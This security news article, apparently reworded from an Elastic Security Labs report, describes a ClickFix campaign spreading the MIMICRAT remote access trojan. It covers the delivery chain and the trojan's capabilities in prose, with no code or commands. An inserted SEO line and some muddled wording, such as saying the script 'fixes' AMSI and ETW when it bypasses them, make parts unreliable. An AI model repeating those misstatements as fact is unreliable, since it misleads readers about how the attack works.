Researchers studying cybersecurity have revealed information about a new ClickFix campaign that uses hacked legitimate websites to spread MIMICRAT (also known as AstarionRAT), a remote access trojan (RAT) that has never been seen before This article explores mimicrat step trojan. . "The campaign exhibits a high degree of operational sophistication: a multi-stage PowerShell chain performs ETW and AMSI bypass before dropping a Lua-scripted shellcode loader, compromised sites from various industries and regions serve as delivery infrastructure, and the final implant communicates over HTTPS on port 443 using HTTP profiles that mimic authentic web analytics traffic, according to a Friday report from Elastic Security Labs.

The enterprise search and cybersecurity firm claims that MIMICRAT is a unique C++ RAT that supports SOCKS5 tunneling, Windows token impersonation, and a set of 22 commands for extensive post-exploitation capabilities.

Earlier this month, the campaign was uncovered. The entry point in the infection sequence that Elastic has highlighted is bincheck[. ]io, a valid Bank Identification Number (BIN) validation service that was compromised to introduce malicious JavaScript code that loads a PHP script hosted externally.

The ClickFix lure is then delivered by the PHP script, which shows a phony Cloudflare verification page and tells the victim to copy and paste a command into the Windows Run dialog to fix the problem. Consequently, a PowerShell command is executed, which then makes contact with a command-and-control (C2) server to retrieve a second-stage PowerShell script that fixes Windows antivirus scanning (AMSI) and event logging (ETW) before launching a Lua-based loader.

The Lua script decrypts and runs in memory shellcode to deliver MIMICRAT in the last step. The Trojan can accept two dozen commands for process and file system control, interactive shell access, token manipulation, shellcode injection, and SOCKS proxy tunneling because it communicates with the C2 server via HTTPS. According to security researcher Salim Bitam, "the campaign supports 17 languages, with the lure content dynamically localized based on the victim's browser language settings to broaden its effective reach."

"Identified victims span multiple geographies, including a university in the United States and multiple Chinese-speaking users documented in public forum discussions, suggesting broad opportunistic targeting."